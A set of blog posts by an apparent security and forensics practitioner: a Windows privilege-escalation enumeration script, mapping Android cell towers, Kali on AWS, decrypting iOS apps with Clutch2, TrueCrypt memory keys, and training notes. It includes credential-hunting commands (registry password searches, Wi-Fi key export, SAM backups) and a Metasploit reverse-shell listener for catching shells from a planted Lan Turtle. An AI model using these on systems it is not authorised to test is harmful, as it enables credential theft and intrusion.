A Script to Help Automate Windows Enumeration for Privilege Escalation

Often when I want to learn a skill, I’ll think up a project for myself that forces me to improve it. Recently I wanted to improve my Windows post-exploitation and privilege escalation, so I decided to work on a script that enumerates Windows systems and looks for low-hanging fruit that can be used to escalate privileges.

The definitive guide to Windows privilege escalation is http://www.fuzzysecurity.com/tutorials/16.html, and a good deal of the script’s commands come from that post or from resources it mentions. If you’re working on your Windows privilege escalation, you really should spend some time on that page.

I decided to use a batch file instead of PowerShell since batch should run anywhere and is easy for others to understand and modify. The output of the script is saved to three different text files. The script is a work in progress, but I wanted to post a copy to help others automate the process.

First the script gathers basic enumeration information (a quick sketch of this section appears right after the list) such as:

  • Hostname
  • Whoami
  • Username
  • net user info
  • systeminfo
  • mounted drives
  • path
  • tasklist /SVC
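
Under the hood that section is just command output redirected to a text file, something along these lines (a simplified sketch; the actual script has a few more bells and whistles):

hostname >> output.txt
whoami >> output.txt
echo %username% >> output.txt
net users >> output.txt
systeminfo >> output.txt
net use >> output.txt
echo %path% >> output.txt
tasklist /SVC >> output.txt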

The script checks whether .msi files are set to always install with elevated privileges, as well as for the presence of backup copies of the SAM for those juicy, juicy password hashes.
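
For reference, the AlwaysInstallElevated check boils down to a pair of registry queries like these (the SAM check just looks for leftover copies in places like %SYSTEMROOT%\repair and %SYSTEMROOT%\System32\config\RegBack):

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated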

If accesschk.exe from Sysinternals is present, the script uses it to check for services that can be modified by unprivileged users.
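
The classic accesschk check from the fuzzysecurity guide looks something like this (my script’s invocation may differ slightly):

accesschk.exe /accepteula -uwcqv "Authenticated Users" *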

After a quick check for sysprep files, which may contain creds, network information is gathered, including:

  • ipconfig /all
  • net use
  • net share
  • arp -a
  • route print
  • netstat -nao
  • netsh firewall show state
  • netsh firewall show config
  • netsh wlan export profile key=clear (shows wifi networks and passwords the system has previously connected to)

No privilege escalation script would be complete without looking at scheduled tasks, so we run:

  • schtasks /query /fo LIST /v
  • net start
  • driverquery

The script checks for any mention of “password” in the registry and then changes directories to C:\ in preparation for searching the entire file system for files that may contain credentials.
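
The registry search is typically a pair of recursive queries along these lines:

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s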

The results of the scans so far are saved to output.txt, and a c:\temp directory is created for the output of the next two text files.

The script checks for any file that contains “pass”, “cred”, “vnc” or “.config” in the file name. It then checks a large number of .xml configuration files that may contain creds, including unattended install files.
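
Those searches are built from dir and findstr, something like the classic lines from the fuzzysecurity guide (a sketch, not necessarily the script’s exact commands):

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt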

The final file the script creates is a tree list of all the files on the C:\ drive, and the script ends by printing to the screen any service paths that aren’t properly quoted and may be exploitable.
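
The unquoted service path check is commonly done with a wmic one-liner like this one from the fuzzysecurity guide:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """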

I recently had a chance to run this script and it GREATLY sped up the process of looking for low hanging fruit on a Windows system and helped me spot a password in the registry.

As I make modifications to the script I’ll post the updates here but you can download a copy of the script at: https://github.com/azmatt/windowsEnum

Python Script to Map Cell Tower Locations from an Android Device Report in Cellebrite

Recently Ed Michael showed me that Cellebrite now parses cell tower locations from several models of Android phones. He said that this information has been useful a few times, but finding and mapping the cell tower locations by hand has been a pain in the butt. I figured that it should be easy enough to automate, and Anaximander was born.

Anaximander consists of two Python 2.7 scripts. The first needs to be run only once, to dump the cell tower location information into a SQLite database; the second is run each time you want to generate a Google Earth KML file with all of the cell tower locations on it. As an added bonus, the KML file also respects the timestamps in the data, so modern versions of Google Earth will show a time slider bar across the top that lets you create animated movies or view only the results between a specific start and end time.

Step one is to acquire the cell tower location data. For this we go to http://opencellid.org/ and sign up for a free API key. Once we get the key (instantly) we can download the latest repository of cell tower locations.


Currently the tower data is around 2.2 GB, contained in a CSV file. Once that file downloads, unzip it to a directory and run the dbFill.py script from Anaximander. This short and simple script creates a SQLite database named “cellTowers.sqlite” and inserts all of the records into it. The process should take 3-4 minutes and the resulting database will be around 2.6 GB.
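
For the curious, the heart of dbFill.py is just a CSV-to-SQLite loop. Here’s a simplified sketch in Python (the table name and column positions are my assumptions based on the OpenCellID CSV header, so check them against your download and the real script):

import csv
import sqlite3

conn = sqlite3.connect('cellTowers.sqlite')
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS towers
             (radio TEXT, mcc INTEGER, net INTEGER, area INTEGER,
              cell INTEGER, lon REAL, lat REAL)''')

with open('cell_towers.csv', 'rb') as f:  # 'rb' since this is Python 2.7
    reader = csv.reader(f)
    next(reader)  # skip the header row
    # keep only the columns we care about: radio, mcc, net, area, cell, lon, lat
    rows = ((r[0], r[1], r[2], r[3], r[4], r[6], r[7]) for r in reader)
    c.executemany('INSERT INTO towers VALUES (?,?,?,?,?,?,?)', rows)

conn.commit()
conn.close()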

Once the database is populated, the next time you dump an Android device with Cellebrite and it extracts the cell towers from the phone, you’ll be ready to generate a map.

From the “Cell Towers” section of your Cellebrite results, export the results as XML. Place that XML file and Anaximander.py in the same directory as your cellTowers.sqlite database, then run Anaximander.py -t <YourCellebriteExport.xml>. The script will parse through the XML file to extract cell towers and query the SQLite database for the location of each tower. Due to the size of the database the queries can take a second or two each, so the script can take a while to run if the report contains a large number of towers.
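
Conceptually, each lookup is a SELECT keyed on the identifiers Cellebrite extracts (MCC, MNC, LAC/area and cell ID), and each hit becomes a KML placemark. A rough sketch using the same hypothetical schema as the dbFill sketch above:

import sqlite3

def lookup_tower(cursor, mcc, mnc, lac, cid):
    # Return (lon, lat) for a tower, or None if it isn't in the database.
    cursor.execute('SELECT lon, lat FROM towers '
                   'WHERE mcc=? AND net=? AND area=? AND cell=?',
                   (mcc, mnc, lac, cid))
    return cursor.fetchone()

def placemark(name, lon, lat, when):
    # Minimal KML Placemark; Google Earth's time slider keys off TimeStamp.
    return ('<Placemark><name>%s</name>'
            '<TimeStamp><when>%s</when></TimeStamp>'
            '<Point><coordinates>%s,%s</coordinates></Point>'
            '</Placemark>' % (name, when, lon, lat))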


Ed was kind enough to provide two reports from different Android devices and both parsed with no issues. Once the script is finished it will let you know how many records it parsed and that it generated a KML file.


This is what the end results look like.


The script can be downloaded from: https://github.com/azmatt/Anaximander

This is the first version and there are several improvements to make but I wanted to get a working script out to the community to alleviate the need for examiners to map the towers one at a time. Special thanks again to Ed Michael for the idea for this (and one other) script as well as for providing test data to validate the script.

How to Guide for Getting Kali Linux Set Up on an AWS Instance

I’ve been using a “jump box” on Digital Ocean for a few years now and recently decided that I wanted to set up a Kali Linux instance on AWS. I ran into a few hiccups getting it up and running, so I documented what worked for me here in the hopes of saving others time and headaches.

One of the first articles I came across was by Primal Security (whose podcast I absolutely LOVE) at http://www.primalsecurity.net/pentesting-in-the-cloud/. There was some great stuff in this article; unfortunately, it relied on an AWS Marketplace Kali Linux image which is no longer available to new customers.

The next article I found was at http://sneakerhax.com/kali-linux-in-the-ec2-cloud/. It was very close to what I needed, with one major exception: the Debian Jessie instance at the link provided has a default main partition of only 8 GB, which is not enough for a full Kali Linux install. I learned that lesson the hard way when my install failed at the very end.

With a hat tip to the above resources, here are the steps needed to successfully install Kali Linux on AWS.

Go into your AWS console and select “Launch Instance” in the upper left-hand corner.


Search for and select the Debian Jessie image from the AWS Marketplace.


Here you can select how many vCPUs and how much RAM you would like. (Admin note: I chose the medium with 2 CPUs and 4 GB of RAM.) Make sure you hit “Next: Configure Instance Details” so you can add more storage space.

The defaults on most pages should work fine for you, so click Next until you get to the “Step 4: Add Storage” page. On this page, make sure you change the default size from 8 to at least 20 GB. (Admin note: I went with 30 GB.) After a full Kali Linux install, the drive will have around 10 GB used, so anything over 20 should be good for you.


Once you make that change, you are ready to launch your instance and SSH in. If you’ve never used AWS before, it may take you a few minutes to figure out how to access your box; after the first time, it’s quite easy. Make sure your security groups allow SSH from your current IP address. The private key you generate should allow you to SSH onto the box as the user “admin” using just that key file for authentication.

Click the Connect button in your AWS control panel instance window, and you will see some tips on how to access your box, including how to modify the key file for PuTTY, if you’re a Windows user.

Once you’re logged into the box, run sudo su in order to switch to the root user. Use the passwd command to create a password for root.

Next, add the Kali Linux source repositories. Typing vi /etc/apt/sources.list will let you access the sources.list file where you can then append the following lines onto the end.

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali sana main non-free contrib
# deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

deb http://old.kali.org/kali moto main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali moto main non-free contrib

Admin note: These repositories come from the official Kali site at http://docs.kali.org/general-use/kali-linux-sources-list-repositories

Once the repositories are in place, run apt-get update && apt-cache search kali-linux to get update information and show all of your Kali Linux install options.

Once that command is complete, you will see a list of about ten different flavors of Kali Linux available, including minimal, top ten, and full. Of course, you want the full version (which is what you have in a normal Kali Linux VM), so run apt-get install kali-linux-full. This will likely take a while to run, but once it completes (hopefully without errors) you’ll have a working Kali Linux distro in the AWS cloud.
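
For reference, the whole post-launch sequence boils down to a handful of commands:

sudo su
passwd
vi /etc/apt/sources.list    # append the Kali repository lines above
apt-get update && apt-cache search kali-linux
apt-get install kali-linux-full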

Admin note: There is a very real chance that you could encounter errors in these steps. If this happens, it’s no big deal. Ensure you added the correct lines to the sources.list file and then just rerun the last two apt-get commands. It may take an iteration or two, but it will eventually work and install successfully.

What better way is there to test a newly installed Kali instance than to type msfconsole?


I tested my new instance’s connectivity by grabbing the public-facing IP from the AWS control panel, opening up port 80 and hitting it from a web browser. That worked, but was boring. What was quite a bit more fun was firing up a Metasploit listener, putting the IP address into a Lan Turtle from Hak5, sticking that in a computer hooked up to a network and within a few seconds receiving a shell.
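
If you want to recreate the listener test, a generic multi/handler setup looks like this (the payload, LHOST and LPORT here are placeholders for whatever your Lan Turtle is configured to call back to):

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your AWS public IP>
set LPORT 443
exploit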


You now have a fully updated machine running Kali Linux sitting on the internet ready to go anytime you want it, for a total cost of a few dollars a month, as long as you remember to shut it down after you use it!

I can’t wait to collect more shells!

GREM Achievement Unlocked

I had been going through the SANS FOR610 Reverse Engineering Malware content OnDemand recently and last week I knocked out the GREM. I figured it would be a good time to post a few thoughts on it and talk about a few things that people can do to help prep for the course.

This was the first time in a while that I prepped for a GIAC exam without attending the course live. I was a bit worried about that with such a technical course, but I ended up having a great experience. This was also the first time one of my courses used the new style of OnDemand, where the course is recorded in a professional studio instead of during a live class. The results were really nice and felt far more intimate than I expected.

Every time a lab came up I would pause the course, work through the lab and then watch Lenny Zeltser’s walkthrough afterwards. He did a fantastic job of explaining things and going through the labs step by step. Even when dealing with advanced concepts, I never felt lost.

In a stroke of great timing, when I was about 75% through the course content I got a spear phishing email at work with an attachment. I checked it against virustotal.com and only 4/56 engines flagged it as malicious, with no further information available. I thought it would be a good chance to put my newly found skills to the test and examine the attachment. I fired up my two VMs and in a short amount of time I had a clear picture of what the malware was doing, had network-based and host-based IOCs and was walking through the code in a debugger examining how it was unpacking itself. It was great practice and a nice confirmation that what I had learned worked in the real world.

In prepping for the exam I spoke to several friends who hold the GREM certification. One of the biggest things someone can do to prepare for the course is to get comfortable with assembly language and with watching and understanding what the stack is doing within a debugger. The course teaches these things, but if you’ve already been exposed to them you’ll feel a lot more comfortable, which will let you focus on learning the other material.

Different people have different learning styles but this is one area where I think it’s really beneficial to watch someone walking through examples while they explain what’s going on. A fantastic free resource for getting exposed to Assembly Language is Vivek Ramachandran’s “Assembly Language Megaprimer for Linux” 11 part video series at SecurityTube.net (http://www.securitytube.net/groups?operation=view&groupId=5) or on YouTube (https://www.youtube.com/watch?v=K0g-twyhmQ4&list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR). Vivek also has a cheap but not free “x86 Assembly Language and Shellcoding on Linux” series at PentesterAcademy.com which really helped me prepare for working on both Reverse Engineering and Exploit Development.

Overall I thought the FOR610 was a fantastic course and I got exactly what I wanted to get out of it.

How Long Do Truecrypt AES Keys Remain In Memory?

It’s been a bit since my last post, and in that time I’ve been to two SANS conferences, Blackhat, and Defcon. It’s been a great but busy few months.

A few weeks ago I was presenting at a local forensics meeting and an attendee asked whether AES keys from Truecrypt remained in memory after the Truecrypt volume was dismounted. I replied that I was fairly certain they were flushed from memory when the volume was dismounted, but that I hadn’t tested it. It’s a fairly simple thing to check, so I made a mental note to test it when I had a chance.

I fired up a laptop running Truecrypt 7.2 on Windows 7 and, using the new Magnet Forensics memory acquisition tool, acquired the memory on the laptop. I then mounted a Truecrypt volume and took a second memory image. Finally, I dismounted the Truecrypt volume and immediately acquired the memory a third time.

Obviously the first memory image didn’t have any Truecrypt AES keys since I hadn’t mounted the volume yet.

In the second memory image I used the Volatility “truecryptmaster” plugin to locate and display the Truecrypt AES key.
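
For anyone who wants to repeat the experiment, the invocation looks something like this (the image name and profile are from my setup, so adjust for yours):

vol.py -f memimage2.raw --profile=Win7SP1x64 truecryptmaster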


Finally, for the big test, I examined the third memory image, which I acquired right after dismounting the Truecrypt volume.


It appears as though the Truecrypt AES keys are indeed flushed from memory as soon as the volume is dismounted. I wanted to verify my findings using a different tool, so I fired up Bulk Extractor and ran it against all three memory images. As you can see in the screenshot below, the Truecrypt AES master key shown in the second Volatility examination appears in the second memory image but not in the first or the third.
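
The Bulk Extractor runs were along these lines; the aes_keys.txt feature file in each output directory is where any recovered keys show up:

bulk_extractor -o be_out1 memimage1.raw
bulk_extractor -o be_out2 memimage2.raw
bulk_extractor -o be_out3 memimage3.raw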


This was a quick and simple experiment to verify what we thought was happening was actually happening.

A Quick Guide to Using Clutch 2.0 to Decrypt iOS Apps

A few days ago someone told me that they weren’t able to install Crackulous on their jailbroken iOS device and asked if I could recommend an alternative for decrypting iOS apps. Since Crackulous was a GUI frontend for Clutch, I recommended they check out Clutch, but when I went to find a good tutorial I could only find ones covering older versions of Clutch instead of the newer Clutch 2.0 RC2. It’s not quite as friendly as the older versions, but it works like a champ on my jailbroken iPhone 5S running iOS 8.1.2.

The easiest way to get Clutch 2.0 RC2 on your jailbroken device is to add the iPhoneCake repository to Cydia using the URL http://cydia.iphonecake.com. Once that repository is added you should be able to install Clutch 2.0 as shown in the image below.


Another option is to download the source code from the Clutch GitHub repository at https://github.com/KJCracks/Clutch and compile it using Xcode with iOSOpenDev installed. Once Clutch2 was on my iOS device I used PuTTY to connect to it via SSH from my Windows system. I also could have used a terminal app on the iPhone itself and elevated my privileges to root.

Once I was connected I typed “Clutch2” which showed the following options:


Typing “Clutch2 -i” displayed all of the app store apps installed on the device:

I decided to dump the third application (which I don’t want to display since I didn’t write the app) so I ran “Clutch2 -b <BundleID#>”. If I had wanted to dump the second app (WordPress) I would have typed “Clutch2 -b org.wordpress”. Clutch2 quickly generated the following output:

The decrypted binary is placed under the /var/tmp/clutch directory. I used iFunBox to copy both the decrypted binary and the original binary (located in /var/mobile/Containers/Bundle/Application/xxxx) to my computer so I could compare the before and after results. Normally Mach-O executable files contain code for multiple ARM architectures, and you need to use the OS X command line tool “lipo” to extract the version you would like to analyze, but in this case the application only contained code for armv7, so that wasn’t necessary.
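
For a fat binary, the thinning step looks like this (“MyApp” is a placeholder name):

file MyApp
lipo MyApp -thin armv7 -output MyApp_armv7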

Below you can see the output of running file on an iOS app with multiple architectures (armv7s and armv7) and on this application, which only has one architecture.

Once I confirmed that I wasn’t dealing with multiple architectures, I used the strings command to extract the text from both the original binary and the binary Clutch2 produced. The original encrypted version is on the left and the Clutch2-decrypted version is on the right.
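
The comparison itself is as simple as dumping the strings from each file and eyeballing them side by side (the binary names here are placeholders):

strings AppBinary_original > encrypted.txt
strings AppBinary_decrypted > decrypted.txt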

As you can see, the decrypted version gives us quite a bit more information about what’s going on inside of the application, and I can start to use the tricks I learned in the SANS SEC575 course to analyze the app and its behavior.

New Video Preview Utility to Help With Forensics Analysis

Earlier this week I walked into a friend’s office and he had just finished examining an iPhone using Cellebrite. The good news is that the acquisition went flawlessly. The bad news was that the device contained over 200 videos that he now needed to preview to see if any were relevant to his interests. As phones grow larger and larger (I have my 128GB iPhone sitting next to me as I type this) this is only going to become a bigger issue, so I wanted to write a Python script to help in situations like these.

The Video Preview Utility (for lack of a better name) uses the “Video Thumbnails Maker” tool to generate a sheet of evenly spaced thumbnail preview images for every video file in a directory. It copies all of those images to a subdirectory, creates an HTML file with all of the preview images and generates a log of all videos successfully processed and any videos where an error occurred. It’s a heck of a lot quicker to scroll down an HTML page looking for anything of interest than it is to click around in hundreds of videos.

Note: These instructions cover Windows and assume Python 2.7.x is installed. No third party libraries were used.

Step 1 is to download and install Video Thumbnails Maker from http://www.suu-design.com/downloads.html. As I write this it’s the third program from the top on that page.

Step 2 is to add the directory where it installed to your system’s path. On my laptop that was “C:\Users\Matt\AppData\Local\Video Thumbnails Maker”. Once you add it to your path and restart your machine it should be set up, but you can check by opening a command prompt and typing “VideoThumbnailsMaker.exe”. If the program starts then it’s in your path, and our script will be able to find it no matter which directory you run it from.

Step 3 is to start Video Thumbnails Maker (this is the only time we will use it graphically), click on “environment” and deselect the “VTX (Video Thumbnails File)” box. Leaving it selected wouldn’t hurt anything, but it would place unneeded VTX files into your videos directory.

Once these steps are done you should be ready to run the script. Download videoPreviewUtility.py, unzip it, place it in a directory with your video files and run it. It will create a subdirectory named with the current date and time, then attempt to generate a video preview image for every .mov, .mp4, .avi and .wmv file in the directory. Adding additional file types or extensions should be as easy as adding another OR option on what is currently line number 24. As mentioned earlier, in addition to the preview images themselves it also generates an HTML report with all of the video previews and a log file listing every successfully previewed video and any that couldn’t be previewed.
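
If you’re curious what’s happening under the hood, the core loop is roughly the following (a sketch only; in particular, I’m assuming here that VideoThumbnailsMaker.exe takes the video path as its argument, so check the actual script for the real invocation):

import datetime
import os
import subprocess

VIDEO_EXTS = ('.mov', '.mp4', '.avi', '.wmv')

# subdirectory named with the current date and time
out_dir = datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')
os.mkdir(out_dir)

processed, errors = [], []
for name in os.listdir('.'):
    if name.lower().endswith(VIDEO_EXTS):
        # hand each video off to Video Thumbnails Maker (assumed CLI usage)
        rc = subprocess.call(['VideoThumbnailsMaker.exe', name])
        (processed if rc == 0 else errors).append(name)

# log which videos worked and which didn't
with open(os.path.join(out_dir, 'log.txt'), 'w') as log:
    log.write('Processed:\n' + '\n'.join(processed))
    log.write('\n\nErrors:\n' + '\n'.join(errors))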

I’ll give this script some more testing with different types of dumps next week and will likely tweak it some but I wanted to get it up for anyone to play with. Friends don’t let friends watch 200+ videos!!!

Long Overdue 2015 Update

It’s been an extremely busy start to the year, but I wanted to make a quick post to talk about what I’ve been up to so far.

Last month I got to attend my first SANS DFIR-specific event when I took FOR508 with Rob Lee in Monterey. I’ve taken the 508 previously, but this was a much needed refresher. As I’ve discussed in a few different articles, the FOR408 focuses on analyzing activity on a Windows computer, and the 508 builds on that base to cover quickly triaging large numbers of systems remotely, a “greatest hits” of memory analysis, timeline automation and analysis, volume shadow copy analysis, and deep dive artifact analysis on Windows systems like I’ve never seen covered anywhere else. You may not remember the deep dive material verbatim, but the combination of being exposed to it and having the course books as a reference means you’ll be able to analyze those artifacts quickly when the time comes.

In addition to being my first DFIR-specific conference, this was my first class with Rob Lee. He was funny, friendly and took the time to chat with students in class and online. Throughout the entire class Rob shared stories of exactly how what he was teaching us has been used out in the real world.

For the day 6 challenge, Rob and the 572 instructor Phil Hagen tried something they had never tried before: they combined the classes! The data for the day six challenge for both classes comes from the same event (508 students have the disk and memory artifacts and 572 students have the network artifacts), so their idea was that teams could work together, with 508 students giving 572 students indicators to look for and 572 students helping answer what activity was going on. The plan worked flawlessly and everyone involved seemed to have a really good time. I was fortunate to have some brilliant individuals on my team and we won the challenge and the Lethal Forensicator coins 🙂

Monterey was a great time but as soon as I got back home it was back to the books. Back in December I answered the CactusCon call for papers with a proposal for my first ever public con talk. CactusCon called my bluff so this past Friday I gave a talk on “Getting Started with Memory Forensics”. There were approximately 40 people in the room for my talk and I received some great feedback afterwards. This was my first CactusCon and they did a fantastic job from start to finish. They had multiple tracks of talks, a Dave Kennedy keynote speech, a lockpick village and an area outside for attendees to solder the parts kits onto their badges. I had a great time and I’ve got nine months to come up with a good idea for a talk for the 2016 version.

That’s what’s been keeping me occupied so far this year. I’d say that now I can breathe a little but I doubt very seriously that it’s going to slow down.

2015 is Upon Us

I planned on doing a few blog posts in December, but due to a few great December surprises I wasn’t online much. My month started off with a much needed relaxing week of vacation in San Diego with my wife. On the last day of our trip I got the type of email everyone hopes for: “I know this is last minute, but would you like to go to the SANS CDI conference in DC next week?”

CDI was my first east coast SANS conference and it was well worth the trip. I got to spend a lot of time with some absolutely amazing people and it was truly one of the best weeks of my life. I’m not sure yet what conferences I’ll be going to in 2015 but I can’t wait to find out.

It was a great end to a fantastic year. I got the opportunity to attend several SANS trainings in person as well as online, got a chance to attend some other penetration testing training, got to attend my first Blackhat and Defcon thanks to the generosity of Don over at ethicalhacker.net, and made some great friends with similar interests to mine.

I improved my knowledge and skills dramatically in 2014 but still have a lot of work to do in some areas including exploit development and reverse engineering. I’m also starting to play with things like using binwalk to analyze firmware and I just got a Riff Box to try to learn to JTAG mobile devices.

Thank you so much to everyone I’ve interacted with this year and hopefully 2015 will be even better.

New Network Forensics Challenge

Recently on the SANS DFIR mailing list one of the members announced he had put together a Network Forensics challenge for anyone who wanted to participate. The challenge is at http://blog.mywarwithentropy.com/2014/11/spy-hunter-holiday-challenge-2014.html where you can download a large pcap and a PDF with instructions.

I’ve only had a small amount of time to play with the pcap but it’s very well done and I’m looking forward to digging deeper into it.